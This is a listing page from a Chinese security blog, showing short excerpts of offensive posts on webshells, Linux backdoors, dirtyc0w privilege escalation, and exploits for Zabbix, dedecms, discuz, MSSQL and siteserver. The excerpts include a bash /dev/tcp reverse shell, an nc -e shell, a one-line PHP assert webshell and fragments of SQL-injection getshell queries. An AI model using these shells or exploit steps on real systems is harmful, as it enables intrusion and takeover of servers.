安全博客 - 第 113 | CN-SEC 中文网

安全博客

利用 dnslog 回显

DNS 在解析的时候会留下日志, 通过读取多级域名的解析日志, 来获取信息简单来说就是把信息放在二级域名中, 传递到自己这, 然后读取日志, 获取信息利用 dnslog 可以回显 sql 盲注的数...

12月15日22 views评论

阅读全文

PHP 菜刀中转脚本

有的服务器管理员脑抽把 POST 方法禁止而菜刀是利用 POST 来发送执行代码的只要把 POST 转换成 GET 就可以正常链接了 <?php ini_set('max_exe...

12月15日安全博客10 views评论

阅读全文

Linux 的几种后门

Linux 的 bash nc ssh SUID 后门 bashbash -i >& /dev/tcp/ip/port 0>&1 ncnc ip port -e /bin/...

12月15日安全博客15 views评论

阅读全文

安全博客

dirtyc0w linux 提权

Linux 内核的内存子系统在处理写时拷贝 (Copy-on-Write) 时存在条件竞争漏洞, 导致可以破坏私有只读内存映射. 影响范围 Linux kernel >= 2.6.22 基本上2...

12月15日18 views评论

阅读全文

安全博客

Zabbix SQL 注入

zabbix < 3.0.4 SQL Injection Exploit 登录界面右键源代码在 jsLoader.php 后面的为 zabbix 版本号 EXP# -*- coding: u...

12月15日10 views评论

阅读全文

安全博客

dedecms 后台代码执行

该漏洞的触发点为 /dede/tag_test_action.php. 起因是 csrf_check() 的绕过, 导致可执行任意代码. EXP/dede/tag_test_action.php?ur...

12月15日24 views评论

阅读全文

安全博客

dedecms 友链 getshell

csrf getshell EXP<?php //print_r($_SERVER); $referer = $_SERVER['HTTP_REFERER']; $dede_...

12月15日16 views评论

阅读全文

安全博客

discuz 任意文件删除

漏洞影响范围 discuz <= 3.4 exp <form action="http://www.xxx.com/home.php?mod=spacecp&ac=pro...

12月15日13 views评论

阅读全文

安全博客

PHP 加密 Bypass WAF

利用国内的 php 混淆加密绕过 waf 原始代码 <?php // shell.php assert($_REQUEST['cmd']); ?> D盾 4级 enph...

12月15日17 views评论

阅读全文

安全博客

Typecho Writeup

之前无聊搭的靶机挺好玩的也有人拿到了 flag 这里有两个切入点社工和 vim 社工关于界面这里我特地写出 xiaoming 和 vim 两个关键字主页也有关于 vim 的文章密码组合一...

12月15日15 views评论

阅读全文

MSSQL Log Getshell

需要支持堆查询. db_owner 权限即可. ;alter database xxxx set RECOVERY FULL-- ;create table cmd (a image)-- ;back...

12月15日安全博客16 views评论

阅读全文

安全博客

siteserver 管理员密码重置

siteserver 管理员密码重置后台 /siteserver 点击找回密码随便输入点击下一步抓包把 Answer 的值改为空成功获取密码 - By:X1r0z[exp10it.cn]

12月15日20 views评论

阅读全文

利用 dnslog 回显

PHP 菜刀中转脚本

Linux 的几种后门

dirtyc0w linux 提权

Zabbix SQL 注入

dedecms 后台代码执行

dedecms 友链 getshell

discuz 任意文件删除

PHP 加密 Bypass WAF

Typecho Writeup

MSSQL Log Getshell

siteserver 管理员密码重置

在线咨询

微信